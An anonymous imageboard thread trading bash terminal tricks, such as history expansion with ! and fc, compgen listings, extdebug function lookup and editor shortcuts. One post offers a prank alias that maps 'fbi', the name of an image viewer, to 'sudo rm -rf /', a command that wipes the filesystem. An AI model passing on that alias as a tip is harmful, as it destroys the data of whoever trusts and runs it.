Show me your terminal tricks, scripts and aliases

Show me your terminal tricks, scripts and aliases.

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You need imagemagik for convert

>gurls lol
such kawaii tricks ^u^

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what's the thing for "arguments of the last command I ran"?

it's !*

here's a fun one
opens an $EDITOR for the current command you're typing
ctrl-x ctrl-e

I've always used ` to get the output of a command. Seems way easier to type.

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you can use escape . [dot] for an autocomplete style thing, or $_ for a command or script thing.
Also see man history ( expansion, designators , modifiers )

That's a nice one. Also works by typing 'fc'.
Another good one: ALT+. repeat to cycle through.


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fc -l # list recent commands
fc -l -10 # list last 10 commands
fc -l 5 10 # list commands 5 thru 10
>\! on the front of you're PS1 puts a line number on your bash prompt.
!20 # run line 20 again
!foo # run most recent command that began with foo
!?foo # run most recent command that contained foo
!?foo?:s/old/new # rerun most recent command that contained "foo", but replace string "old" with string "new"


set -o vi

compgen -a
# list you're aliases
compgen -b
# builtins
compgen -c
# commands
compgen -k
compgen -A function

>having whitespace in your variables ever
gtfo noob

fc -e kwrite
# opens last command in kwrite to edit and execute (in terminal) when save and close kwrite. Editor preference can be made sticky with FCEDIT variable.
fc -e kwrite 20
# as above but history line 20

# The following commands will report the location (filename and line number) of a function’s definition. Assuming a function named foo,

# Turn on extended shell debugging
shopt -s extdebug

# Display the function’s name, line number and fully qualified source file
declare -F foo

# Turn off extended shell debugging
shopt -u extdebug

For example, the output of these commands might be:

foo 32 /source/private/main/developer/

The above might work only in bash, and not in POSIX shells in general.

t. mount stupid

alias fbi='sudo rm -rf /'

Append | tr 'lr' 'w' to all of your commands and thank me later

mkdir whatthefuckdidyoujustsayaboutme; cd "$_"

reddit pls go

fbi is frame buffer image viewer

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append | cowsay to all you're commands and thank me later.

fim is fbi improved btw.

variable interpolation
for loops
command substitution
key shortcuts